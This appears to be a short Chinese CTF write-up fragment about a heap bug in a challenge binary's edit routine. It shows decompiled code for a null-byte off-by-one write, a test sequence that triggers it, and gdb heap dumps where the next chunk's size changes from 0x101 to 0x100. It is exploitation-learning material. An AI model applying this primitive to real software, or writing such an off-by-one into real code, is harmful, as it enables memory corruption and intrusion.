vuln
在edit调用的readbuffer函数去编辑content
for ( i = 0; i <= a2; ++i )
{
if ( read(0, &buf, 1uLL) < 0 )
return 0xFFFFFFFFLL;
if ( buf == 10 )
{
*(_BYTE *)((signed int)i + a1) = 0;
return i;
}
*(_BYTE *)(a1 + (signed int)i) = buf;
}
*(_BYTE *)((signed int)i - 1LL + a1) = 0;
将输入字符串的结尾填成了0,而a1则是直接指向申请的堆的
测试
new_letter(0xf8)
new_letter(0xf8)
new_letter(0xf8)
edit_letter(1, 'A'*0xf8)
在gdb中再可以看到堆的情况
- edit之前
0x603008: 0x0000000000000101 0x0000000000000000 0x603018: 0x0000000000000000 0x0000000000000000 ... 0x6030f8: 0x0000000000000000 0x0000000000000000 0x603108: 0x0000000000000101 0x0000000000000000 0x603118: 0x0000000000000000 0x0000000000000000 ... 0x603208: 0x0000000000000101 0x0000000000000000 ...edit之后
0x603008: 0x0000000000000101 0x0000000000000000 0x603018: 0x0000000000000000 0x0000000000000000 ... 0x6030f8: 0x0000000000000000 0x0000000000000000 0x603108: 0x0000000000000101 0x4141414141414141 0x603118: 0x4141414141414141 0x4141414141414141 ... 0x6031f8: 0x4141414141414141 0x4141414141414141 0x603208: 0x0000000000000100 0x0000000000000000 0x603218: 0x0000000000000000 0x0000000000000000
0x101被覆盖成了0x100,堆块被弄成free状态了